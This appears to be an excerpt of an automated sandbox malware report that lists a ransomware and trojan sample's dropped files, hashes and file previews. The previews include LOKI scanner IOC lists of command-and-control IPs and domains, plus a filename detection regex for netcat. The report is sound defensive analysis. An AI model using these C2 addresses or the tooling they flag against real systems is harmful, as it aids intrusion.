https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-custoZEUS	vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	false		high
http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-si	vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	false		high
http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.htmlTThere	vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	380813
Start date:	02.04.2021
Start time:	13:45:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	GZe6EcSTpO (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.expl.evad.mine.winEXE@15/1031@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 95.8%) Quality average: 84.5% Quality standard deviation: 25.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtSetInformationFile calls found. Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\Desktop\00554e26-4141-4a67-98c4-9454bf8d1c70.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	814
Entropy (8bit):	5.9972119194817886
Encrypted:	false
SSDEEP:	24:Lrir6LS7hRhOfHpQGxNrZ3dwrfBykIK1/2Gc:Lrir6LS79cVx1U/l1/23
MD5:	6D20AF695248EAF93481520F7E2DD3ED
SHA1:	6C796CD496159763A9FA6B3A9A4AEFA19290EA69
SHA-256:	A95295DAF42AB4AC347147E74F586FF9F66FCBC542ED9A47828C70E602963E02
SHA-512:	919FCE23EB522FC5DD96157BBE3ABBE8E9CF84E8333095E1A34D8EEE299462EDBEDA41D77B201E5BB2D2256CFBB9C785F8BF48C172F2F3A04F241BB902CEAD32
Malicious:	false
Reputation:	low
Preview:	-----BEGIN PUBLIC KEY-----..MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAtwfqnAhISbHDPlUh8njL..ScFvJ/7vAxm/mOGmVNhAw+pX590rfkwPox0RjTFb6X/s+MTzH3nzw1eH1YWx8Q5/..aouuVGVy6whFYHIVKH1bAFQgJa8hLjTKoHdpwa6vpolwl02e7py2xPkskE26n/ry..IQlxCVr+A0aAJFR1doTtw2ry40TnPrNp5w8C/HcKBPeduCXBKlx7voc2rQCj+qz0..ysCBHy5HfI1fQsp0pFY3j9gLWvlrd2EMAMviorjxN3FA3qb/mMC7fN00dZdzDbEU..Me56T329vmBh1ZdD6m7G8qmQ9aSnX2ri1pwbEF0QIbAHEbBQtAU9+H8AUSPLcJ8Y..t2hxNEOhudCR4W8124YE0E7gNtgXCzwTd7xdqvKEx9I3dZr6+xMsd1k7qnwBoqDd..TWs0UFkVK8so63mb8wb3bUszVIxqH4GWoi7/BBkJ4dWfVX9xFlRQ7cGsC20VeNJ9..NqT1X6R98QudAzYoRHKfJ9g4VJmcMbsU7e0pIqG+mT4NFxXtywEcMbkeBzIHyl3n..QkRhzBbxW+X0p/bqiobsjlE6JTG6rDuD0TmuaX0rP5xPW0TsocpURllbxArmbwE6..Zt0WpT8SVlldwLBQfKD8oKMa5LDRJYTEc7+b108JM8M+S1oxsHcMaKinM3KxJn/z..CoFednKxtoKHrdKuTUEKNg0CAwEAAQ==..-----END PUBLIC KEY-----..

C:\Users\user\Desktop\28f4fa56-e109-42e0-9d12-1e216cf1181f.bin Download File
Process:	C:\Users\user\Desktop\vnwareupdate.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	686
Entropy (8bit):	5.950052331527314
Encrypted:	false
SSDEEP:	12:M04wfibXi2jtURXWCYINWLxjlL+GzSu3Jj7gTwXVUmR4ccFxedz8zuMt:DLawYAKRN+sJjkTOL4czwzp
MD5:	D2DC890D420A752343B84777B2B15018
SHA1:	52693B5E57B270E90705BCEA61A1B8FD77702F9B
SHA-256:	6617AA8DC747A36F6F399485578202B60C12B4FDC66BB30A7411B3ECA5643D03
SHA-512:	78960DD4DB754FF901337E4F85E5D5296F4EB8BDB16563AAC604B6F31CA0B27FE46F8550F39D46D70B44A3994D727C41ED1C6208893A41F7C08730223F5C4618
Malicious:	false
Reputation:	low
Preview:	o2ZdDKvrIIh1iNx4pmOU3KhguTF8HHhpC01cy3aWvxLolIcpMSyvyVjRe+uwxbeQ5eOcuScOgjYCdEJe8F9U5IXz8W92wxcpMrDZ31fSYltvQFXjPK8itFWUqLj757FoMu5KRwB4X6rmI34wT2zrQMY29rHqC6Wf98cAmYkgHH7ob9PQ5GVIJ5crR5wG2gi9kQazbG+tPYqhqZhCAI1MS78XOHfMixBMZHrJaxzB9MF5kEu3b/3X0Qm9J2QBGPexW4f6qmaw12P1wK3UymrVJZBmBdvTQrzFS3IhLIvEejz+I9dcaQgCthKBxeupwe0oXf2qzDyjFNoKiaz9I/njnOiRr2LHyZhuR59ekdzG4gdSbKr15z+6rl/tVnr+G9gluQZi/EoUNCynRcj1tCqmf8/0QwC5DX0wP4dCrdNQQhKmDTCJ7uMzPK2KC378X8JcFN4nzDgmPRLq3rAgdCwrdeqC9iIRHoJuWwToLvqWq6KpURoiQmWw9sEMGS7FqLOMJFmt64Ojo53VV45DsPpRdW07s9tO75wuh99zHE/PEm9A5zrcXIMrkVthSLvh7pDl9yPY8uV6bDP2Nnj7HknQ3duRDgpOmIy7gPkLRfwVhUpfK1yMKtxJO2IMtByz5h2q77plZ6ns1EcAegaFsl4U2CKmxHZWWuCXBDOJhAwpubs=..

C:\Users\user\Desktop\2a5e15fa-fe3f-471c-b784-6a56e4aeac95.bin Download File
Process:	C:\Users\user\Desktop\vnwareupdate.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	691
Entropy (8bit):	4.519576746002026
Encrypted:	false
SSDEEP:	12:ToTbaQoT/CAoT7zPouQHbW8PouQQcCoyfQuq77oluZDqu7oXo28F/LIb:cg23XcZbUBRB0luZeuMYn/L2
MD5:	3C347E3891AD17A7A67D80E0CC4DED5F
SHA1:	F5597FF96A4F71C5E4FE3619D311D1010A8E4DAA
SHA-256:	7BCB4D39B18A2D4604A1CA09BDC67374C9363404D474335F7D4A6EA3A234A279
SHA-512:	C7CE4A795C5B2B8F7A92236ED968B33DD00980A79906D3A47AAFBCE49203F7446EB52A96E1D3DD34D11D1D3D8206B37E25D637999123590C77FF8DCDBC6D3954
Malicious:	false
Reputation:	low
Preview:	2021-04-02 20:46:44.044000,2021-04-02 13:46:44.044000,INFO,main pid: 2540....2021-04-02 20:46:44.044000,2021-04-02 13:46:44.044000,INFO,manager pid: 4456....2021-04-02 20:46:44.044000,2021-04-02 13:46:44.044000,INFO,listener pid: 6352....2021-04-02 20:46:44.357000,2021-04-02 13:46:44.357000,INFO,['571345' [] ['192.168.2.3']]....2021-04-02 20:46:44.357000,2021-04-02 13:46:44.357000,INFO,mp_feeder_scan pid: 6404....2021-04-02 20:46:45.653000,2021-04-02 13:46:45.653000,INFO,mp_files_scan pid: 6432....2021-04-02 20:47:21.403000,2021-04-02 13:47:21.403000,INFO,mp_processes_scan pid: 7044....2021-04-02 20:47:26.747000,2021-04-02 13:47:26.747000,INFO,wait_for_work_to_finish pid: 5432....

C:\Users\user\Desktop\93d72046-08db-4412-ab52-b014148c1823.bin Download File
Process:	C:\Users\user\Desktop\vnwareupdate.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1054382
Entropy (8bit):	6.02122638951826
Encrypted:	false
SSDEEP:	24576:uBQPLeEdPue3mISdjmRjC1UyDMA5+6g2euETlF:iQDJWI6qMU0MfF
MD5:	F400F658228104294620A36C1979F81E
SHA1:	F833736D4C42729BC13D3EB41ABC478CE32D414D
SHA-256:	97331DFABA2BA81A43B307C57A05FEF8DEC372E5B553F3212CA9029C478AAB20
SHA-512:	BFD698A90A231B9899FF848297A6AD6C14C0355C8A67A194B51DB26BEE2667CF85B63A079B6E26DED5F69D9F991131A07963D0D62C6FFEB5F5DA78A7E1A42128
Malicious:	false
Reputation:	low
Preview:	ru3KNoo8nbHSDVCTlwcIDmLyFsx44KJF7q/+Tm++4wC2LYNymKdoxQXJ7mWraySOihjkyiuQ9XJHCL8sKWMMVb5wAIN2NNHuCOH5G7yhrKsV2ET/aOUNMduYk0/kbDAw6feYyn0EhNB88kzJTzmUHVrqmbb2XSxyNEjpRqd6wLPz7ClgKTS4P3d3tvvZ1/3VfL6Nkn2I5lqf2cTyOywxZi/0ex3SdSsZ3pOXLoaMCwOjylvYg4SBGK+mpPmDdBfFTznIhxmClXlKfC5llvla1FyyvN54xCp6o3BWnm5J/dH9Ud1LWi4Ek4gVZ3ynDsoUs2KliPbCqo2xZS/qeep9qoUxsyBCSmf15UTJ6JZw9JwnQ/cDuCk6umHJw/hAr3+aPA+m/idEDshhpRvfS8B9Im8EDk58vpj7Ej3mH9kWUcrwDOux2ZNRo7GYQTPjtCS8UGcQ5Jjir1aIvoJ7JsXpaMaCU09Pq1/CHnQAhmuUuEkBDlwTZfqKAvFVTEK6UhXPmt6UT3mHx6fTmcOoRHfq3skqTwTUY9vDYwuHOtW+BrM6zfVkgj11a9kqRST0vaOaSkwZ+MOtiWVh/fJH0imGvOCyVlGttV7AdjL7Twn1SXcTs90E22TChqdu2CTXD3cOgzeK+ICIQlLXBc9YNN+2arxbKv33wJWf7DDM0WUMywM=..BtFZkdOfhGKr1KFoDXSpVcPSiYUi6KiAL91fBI1Ze0R2UcGSlAVAoOt7fjg22VUd8XCMRrSvWXimOORQp6sDJQ+vazDC26DjFRHlaeGcOYlMt5rbC2kKgt/xzZfV5pSXSJyiX9skOX9khdi3+VPyvwweAhup/8+zFEVfNLqYm9vOpu7xU18GZSgp5fz2LQmaD8TWShVcaZj7Ff5/HNPAsDpeOAvC1p0SNlP+Zy4/r8iyUdTMF3gVAmhlvGh8i4BbgRvq+aCTSPTlAXpwdyLnZXbuTzmxYn9qdXY80txFu031ZEdVvzoP2GSwl/

C:\Users\user\Desktop\9703e260-d265-4332-8de3-4e5fab56a248.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3488
Entropy (8bit):	6.050623140531944
Encrypted:	false
SSDEEP:	96:LrkTZeTyZFHDryrEomRniGrj3XliaIu0M4sSpmyY:HkATyZFPyrEtZiGrLXQaD1n+myY
MD5:	D10057E6A762943FEC8D994F307A2BA4
SHA1:	A2B5FEF2142D2614D3F438F11558F76935F7AD76
SHA-256:	637C38D56733FF1340A05E39CB9128CBFF0A64FF8D96201546C265E510EBE74F
SHA-512:	521EC66C4CF0EEE8A3A75A6D66C2AF28050A69376B5B2B77987945DC3622A73F7E65876A3C2316C7F205BC0DCB8CAD349CE884FE25C32C7FFEB777307E5FB5A1
Malicious:	false
Reputation:	low
Preview:	-----BEGIN ENCRYPTED PRIVATE KEY-----..MIIJrTBXBgkqhkiG9w0BBQ0wSjApBgkqhkiG9w0BBQwwHAQICvND+qa8mnkCAggA..MAwGCCqGSIb3DQIJBQAwHQYJYIZIAWUDBAEqBBA+TpkqSmbnMbyQAnE+kvsLBIIJ..UCmgpB95E6g9kmV5Ohd9eAbkxoKpEJ1bL00tgfPRX3/fqGmCGZjVT2LoVGpUg7pQ..5jD1ToAtSYjQu0LBlL4WCxPSzdLSN1yQxVGg0xzgqnT6jUqb7RiLZCMMEWkIeSui..O8RwsWJ9ir+BAD2eHHFTOQbzaJ2jAu24jVVZz4hiSKA9qiCjkwJqtUNJzwpEPhlL..ReomA8C7qPrUh8LSDKPTmeQoVOFwoEnh9Q8lzuOPczd/JIAMDejA5EcWCumIA0AD..HnFcm51YzzL+AwmYu7/2heDN3lh5F8VdCtRwu+A5i38D1sq5Kkv0vKKH0PdQ+7Ar..ETMv1MD6wq/7nXY6Z63wG+0La5xAfwomQ/4NQ5NIgkoSHFsCmgCKs1sUcObcuzfj..v1QXUnqpzdwxGrZWCLxQNqLUf51XrQ826kilQv+BA3VujnA4k6c+9Y950S1C7oT+..kIwDPcg+V9Xjom9yGSg0LaHSBeP9MLVs0ldJzO/yKJ0RdrotAXiVViUDBeV7chGs..Y3aEyYhn7VBGUAQ+Bk5joKlJucIU2Vmewh75RfjbD7UwsmuZvd1Faf175eESvU/v..xKB5JmgmhjfOSjgO5w1jjZDypqi4GXStKmETdLpAlg4hhcmNN4tPh0SZ5ejqaNK7..2vlA1RI5lmH9CiEIfhKkgt0VBdoKxnKWALnvelo19w7Xl9npJG90zusM2dFOxmpi..AYmCZgiLXkuJpJ15pvQEFXFOwHP2SWErRmW43iVIWspc+pLrNWsRL/3CukLPRipg..z6Juuazq+tGcT1qdx+kS7NVRL5NU8jWMLuYPx

C:\Users\user\Desktop\MSVCR90.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	653952
Entropy (8bit):	6.885961951552677
Encrypted:	false
SSDEEP:	12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
MD5:	11D49148A302DE4104DED6A92B78B0ED
SHA1:	FD58A091B39ED52611ADE20A782EF58AC33012AF
SHA-256:	CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
SHA-512:	FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................\|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\Microsoft.VC90.CRT.manifest Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	414
Entropy (8bit):	5.277228517582997
Encrypted:	false
SSDEEP:	12:TMHdt4vO5mSN4d6F+MHFVIogVW/AnpNnUvz:2dt4WlN44F+KIogAAn3G
MD5:	D6D3CC1C61F96101FC2E1E1CAC20462E
SHA1:	2C92803EFF07CA4CBBE02974871806E2006D51BB
SHA-256:	0135463F733FC4CBC5AB6C3A0F1A8BA55478E670DB1C33B4C4B9F7F67664DD81
SHA-512:	AE1C366B344E31392D05E50A487790A27760A8B527558F77A4B144D12606563C01F71D505F56B25C73E3FE89701FD3CDC2D464442D7E4FF01C06D7C9566FFD14
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">..<noInheritable/>..<assemblyIdentity.. type="win32".. name="Microsoft.VC90.CRT".. version="9.0.21022.8".. processorArchitecture="x86".. publicKeyToken="1fc8b3b9a1e18e3b"/>..<file name="MSVCR90.DLL"/>..<file name="MSVCM90.DLL"/>..<file name="MSVCP90.DLL"/>..</assembly>

C:\Users\user\Desktop\a6be3467-9cec-43b3-8e87-ded73d446923.bin Download File
Process:	C:\Users\user\Desktop\vnwareupdate.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	686
Entropy (8bit):	5.948642917024559
Encrypted:	false
SSDEEP:	12:gdQmnMuM5lHnpkvqaLXvvQwvEaBcU1F3LpraIqfjphSTOgmOBRZQWVV:g2OM5lHpkvqyQw8aBhf3LpGvpjOBRNVV
MD5:	2B5E17FE5E3CF77017F3529B78A5DE5E
SHA1:	E9B36FD4376198A13932C6C86B9BC331524EBD2E
SHA-256:	3DADCDEDC430D45B1D18D23EF0BAA5E1FDB34A9CF67FF298B553C03AA48AB143
SHA-512:	4BF64767EF6C16B147E79B54A4F30A168FC53BCB959D2483C51693F693BD79D7B42C365719B6FD601EDFAAA5B9CC0267D69A18A7BF41698F488E6BEC735AD1AE
Malicious:	false
Reputation:	low
Preview:	knDCN3InDFf/1ehqc0f5TdxjCF9HA8MEFic/VICquMdDfFh4o+xbTBoEhhD+Vce9d2HLxICtTdPjclOx+eykDPdAWbloO6KI912yeJIewSkBuxRl/dxjfIY9xoNmxzHSohoCypQKHj8dB38GVy42/QDVpZlA38nrhkElNrvbmwjht6Q7OwU+CALpBa/zdsJkpdPNUOYJqmOqFZkpuYrPl0etDg+yu/0vonQd6gBx+blABK27NE3p2eBkQTxYATvyT1/18fIHkKbXUxQv/5JRATNfjesB6EjabIRXlgtH3jCQbdIWT36hyO7iqoQ/S7+0R+ig4idCoI51IYU3jj0uL+jGZ30DBkruM37qNbJI96MvUjKl19wkctYsK9AeTK0h57V7DBCjNejOcbl07prxlF+ZBScnO7Zbc2XEcYpUuddttHEIUedIexPeUdNCd5qzWDEKQSXzMZ1sNrRhQ+NWjyrAobBWfiQRcZopvYMr/BiKof7Lnm5VTsm6v1UZ8LRzLVPs9MsRttLkm9oqaIpHBnw4lrAwowQQrgv/e+1xsPp9ypXwIRfy2iEh1HLIKykt+XPNNnmLHzOcBUj4tvhBkljn4oTSo5Wt64GryANxen4KJODIK5wZpkO+xWGeiurYpi0cMbV1HoDpCAQ5mHsI+vaWKl73G4BqMAkWSeYCPbY=..

C:\Users\user\Desktop\ad421c32-aaf8-4995-847c-18069215aace.md Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2604480
Entropy (8bit):	5.999984131582419
Encrypted:	false
SSDEEP:	49152:AZy+mbvx1IsHprFk6UrinnWmy9axyH1/4u:E
MD5:	3B90178050DED0678B4DAD0A767E5350
SHA1:	7B6E73D20984A7BBA4FDA9AFE44BC196F50B9E57
SHA-256:	8F83C493D8F965B1A8FAC98E9D889F6870BC1199B8ECF1DEDE57904F3E5B4CF3
SHA-512:	9E14127DF76B5A5A2B9961F8DCA6B26693AD30E9EAADF7446ACA9B647CC450AC2C6BA249EAD7586DBE15188794FC83255BE55F99814A5FBBF1E6DE8A8C88DD7E
Malicious:	false
Reputation:	low
Preview:	K6CpTPCvfyIK6zsxaY9lU05OmQpRqalV55u47++IJZndzNNl7rDltohRzccApRrLigVzcswwKNzonXCI2mhi+5lUO+Znr/MpBZO3SEP8Wn5DRJ7fBiNEYdrqQ74bQm8Vkq3Zv0a06EP27v9yU5mSRQ9LD5sJG35YobWzSzzUEk9DM/etOUKuQFkwSFqqKP5iyMjHH+PQ76xe5FMVCQ2kGJENxGGhlZLktLcGjpHyyzdtt8RYkX3SLPUi78CrlV88KZrp7QEzp9hXCDwYLdj771q/Ha0dwlN6XJv2E7lFvH2auOQg0U6mL201mHiQoFVR+fZ5f8I9hBmm7EJssHP3429lGSwm3Eiiq0IEgBGaXLRHoy6PQBY9fZA+CpeZ9JVj2a27IOMH8kVXUEbSgFVcAl5VXBbKeCK9RILL87sqAjVcXWWU65nIev67JN9JxlI3D9gk23/gRqEC9Q192PQ8d5/vYOgNiJNx6BMIgcMeqF4fnAnAkZgJNsYBGmxZwnEcNC4ew2XpBXfvLgY8q3pC0U8i9vjTB1n2uhHaAgByBFXJt0BZEmt+0mNdMcgX/gldafLoIZw+5FIoM1ocIYc0cW53NTPPebHbbynwrmbAdFZjjzKKBFD1Y90RCewh9WqhiY1/xd8Kcu6spFeGO3Md76EzXOTllZ77dBtSvc8mjvAVJdCp13j80yGL+qqHalBGE4pHFvt6DLq2xs3M67+MLfeCSUIXNXvca6FoDNVgrjNthp6h7rSiqB4eEm/uNrtZ4LguNA93kg3Q+FwNgw7V14sQykN9G1XbXZOYMUSSERxcItqusP3yVOlGfGPABOyamAwsMworxiC8UtrEy/jjh+bzGoPmQ1LFqBIYUTxrPC8YaXrCcCUMtFa0RY84T1uhiQuXVLim11S/lSnBmbKb0h70kOXeqcaW0hwwxBVLZE8ME5KLhwGfovooeIGiT770Hx1a+2JcUrWNI+J0FKbcPKjvktKAhBbWKvpReqA5

C:\Users\user\Desktop\c2-iocs.txt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	96295
Entropy (8bit):	5.159510685896611
Encrypted:	false
SSDEEP:	1536:N2tqRJgtt7AF+L6uRYPQT9HPR4MV7/VUg:ktq4t2YGDQTh51xOg
MD5:	B4C61F0E08EA7B7F1C4D666DF65A9004
SHA1:	6FB571CC2D826727109E6CCFF91EE8C91C81A372
SHA-256:	2EDEC291BFB6CE4ECACBB75FCB79C6B0021B7F61E38680966B465C2976B24B23
SHA-512:	58A2306E878CE023AA541F3F177D9B062BC06DA14757339D046094CBAE0529EED77C25570274A1847F03B5DF3AB4BC9B16D1BC575FDB2F98EACC885B960F38BF
Malicious:	false
Yara Hits:	Rule: APT10_Malware_Sample_Gen, Description: APT 10 / Cloud Hopper malware campaign, Source: C:\Users\user\Desktop\c2-iocs.txt, Author: Florian Roth Rule: APT_DeputyDog_Fexel, Description: unknown, Source: C:\Users\user\Desktop\c2-iocs.txt, Author: ThreatConnect Intelligence Research Team
Reputation:	low
Preview:	#.# LOKI C2 IOCs.# This file contains C2 server and decription.#.# FORMAT -----------------------------------------------------------------------.#.# C2;COMMENT.#.# EXAMPLES ---------------------------------------------------------------------.#.# 112.22.33.234;APT Case XYZ http://url.com/12345.# evildomain.info;AV company report XYZ http://web.url/..suroot.com;FireEye Operation Snowman https://goo.gl/x1v7mT.58.64.143.244;FireEye Operation Snowman https://goo.gl/x1v7mT.effers.com;FireEye Operation Snowman https://goo.gl/x1v7mT.118.99.60.142;FireEye Operation Snowman https://goo.gl/x1v7mT.58.64.200.178;FireEye Operation Snowman https://goo.gl/x1v7mT.58.64.200.179;FireEye Operation Snowman https://goo.gl/x1v7mT.103.20.192.4;FireEye Operation Snowman https://goo.gl/x1v7mT.58.64.199.22;FireEye Operation Snowman https://goo.gl/x1v7mT.58.64.199.25;FireEye Operation Snowman https://goo.gl/x1v7mT.180.150.228.102;FireEye Operation Snowman https://goo.gl/x1v7mT.111.118.21.105;FireEye Operation S

C:\Users\user\Desktop\falsepositive-hashes.txt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2968
Entropy (8bit):	5.2399125809736065
Encrypted:	false
SSDEEP:	48:dR0u9dcnZJqS9zTedSm6/Rz63e02pHjRO93+eo16a49u9KJ9u9TW89nKgWIfLT4V:bXcnZwS9zTedSX/V6O0o1o3Xo16a49uc
MD5:	FF0023420D9138B6F67E775B24DCAE29
SHA1:	C87C024BC7CFA009B9F63952FF82508043B31E3F
SHA-256:	6A55C0D4ABEB777B6B6E042004BC13365EAD2A2483998D891B2E767947C6B99F
SHA-512:	8612DFDC4A417438F70821072B582FB5C1F3A7F1E79A569BA3CA518BB49262160DCC03463289C74104046B59ACE86406D452F5B0E9A433EB4B4322F47BBA44BC
Malicious:	false
Reputation:	low
Preview:	#.# LOKI CUSTOM FALSE POSITIVE HASHES.# This file contains MD5, SHA1 and SHA256 hashes and a short info like file name.# or hash origin.#.# FORMAT -----------------------------------------------------------------------.#.# MD5;COMMENT.# SHA1;COMMENT.# SHA256;COMMENT.#..5cfbe1fb8df52bfba6d021319b0da899;Yara Rules of v0.2.6e5ebbc8b70c1d593634daf0c190deadfda18c3cbc8f552a76f156f3869ef05b;REGIN False Positive - Microsoft USB Scanner Driver.7565e7de9532c75b3a16e3ed0103bc092dbca63c6bdc19053dfef01250029e59;REGIN False Positive - NSRL listed.a26db2eb9f3e2509b4eba949db97595cc32332d9321df68283bfc102e66d766f;REGIN False Positive - Windows Serial Driver.18cd54d163c9c5f16e824d13c411e21fd7616d34e9f1cf2adcbf869ed6aeeed4;REGIN False Positive - CD Tower Web Client.0099940a366b401f30faaf820f4815083778383a2b1e9fab58e16d10b8965e3f;REGIN False Positive - USB Scanner Driver.b04a85ef2edbc5ac7b312e9d57b533d9d355d0c7cbbd24a8085c6873baf9411f;REGIN False Positive - SCSI Driver Windows.581730d7cce49af90efad5f904ce

C:\Users\user\Desktop\fc38c7ee-ad18-4c74-a67c-9df763b1d8a4.bin Download File
Process:	C:\Users\user\Desktop\vnwareupdate.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	686
Entropy (8bit):	5.950460110681684
Encrypted:	false
SSDEEP:	12:e1H/GUUWp2aiU09T90o107W0mGMSNNAMpeYNSf5SGJC/:exhpv0oo10C0m7SN6MbNSf57k/
MD5:	31FDBFD635834D7716A5066A718778D7
SHA1:	8930FFC35E78A225C383FE9156F49618ACBCD8A5
SHA-256:	8A7FF0C2FCADC00B06FC8E263E448252B592CE8C57D39D0BCEF1D40B6174603E
SHA-512:	052702651D1D6770C47A863691BB9DEE75D572F79D080DE4D1EF668F168420C5C2AD8EB4CE13045689FB39DE005BDE59A82EC66F636E70BF9988252FBD28BCBA
Malicious:	false
Preview:	cuuMDpgVgEFyHxXeO0SHFbmPWWiRG+z2UeG8BEhhiwLv5o6hzuA7fpfwbciz0gHrvSEgduxKcSaXAovh4EKMSgNHd+9B4U9Y+kOwB7rclgg7jyOLIIllsS7S397VFIhgOE+QN4qFXW14iXaq9n0HtdSoRaqNvTxeUDhk1DNn3dupz8KzISp1KYsOusAjRQg9ttb9lYHj81qWTmz69ekDLkPL0jwu5aGVWVNdZ9vM4BwJ2z8dnuQ3mjZuuUon0d/V7T2B/DYbqo1aBr2v6H+A+pE2U5jvDIl9MDjM8A4HlwWCRO+hsulNDuNAbCMrnnm6jYjnwQL+lQHHRjkqtkQai1si/ZPUlC6zbY72Vcj+7CDEGW6UHZMtpAZal6+0r+rbvTVOva6aBvhDkGASktSrDO/HwJzrqSoQs1XIiw9QC5j4DV1rjCFuYRUSzrDSyx3+U79E7DhhkA6WSIToErpHDVnfT1mau6PkRCCWtclejJrtPrtlX4UJdeMTLoJlrKtCryBsnwkFYXf7JQc1sd4Lg8ptxmM4jheEEJIyfTakt9YMLfZrMvTzkgufD4yhdu4STpkP624f5BmK+EDXtvaBCStHod6JuhTwUxiyvpedioXVE64b0nh2k3jyYzwPp4ydTEXTICM9mJvFQBtt4/QFwayFy10Oit74p0KF2r0XXL0=..

C:\Users\user\Desktop\filename-iocs.txt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	75114
Entropy (8bit):	5.201861904999131
Encrypted:	false
SSDEEP:	768:u3q4hyhojg9zWqHJv1uENxnZAoBeV17MXgz1v+8MdOSPYiUlKzS2:u3qGyhyg9zBxZAieV17vm8MdrYiUlC
MD5:	34189DD9F0D63FAB85E95BEE7E5B7AAB
SHA1:	0FF070F560CA11B79B02AC66880683F543343EB8
SHA-256:	3856DF85CA14EC8A231329BD69F76062E795A1B94DE37FDD52B1B66C34B857F2
SHA-512:	84F2DCE9814931B98AF62662031AEC9D7489297B39610F65E0CB73533355310F8C9938613DB08CC36B5C69C468FBD423A61799CA89043C744AE266CA01A46C5A
Malicious:	true
Yara Hits:	Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: C:\Users\user\Desktop\filename-iocs.txt, Author: Florian Roth
Preview:	#.# LOKI File Name Characteristics.# This file contains regex definitions and a description.#.# APPLICATION ------------------------------------------------------------------.#.# Every line is treated as REGEX case sensitive..# Every line includes a description that gives information about the file name.# based IOC.#.# FORMAT -----------------------------------------------------------------------.#.# # COMMENT.# REGEX;SCORE.#.# EXAMPLES ---------------------------------------------------------------------.#.# # Various examples from APT case X.# \\svcsstat\.exe;70.# \\(server\|servisces\|smrr\|srrm\|svchost\|svhost\|svshost\|taskmrg)\.exe$;50.# ProgramData\\Mail\\MailAg\\;80.# (Anwendungsdaten\|Application Data\|APPDATA)\\sydmain\.dll;80.# (TEMP\|Temp)\\[^\\]+\.(xmd\|yls)$;80.# (LOCAL SETTINGS\\Temp\|Local Settings\\Temp\|Local\\Temp)\\(word\.exe\|winword\.exe)[^\.];80.#..# Ncat Example.# bin\\nc\.exe;80..# 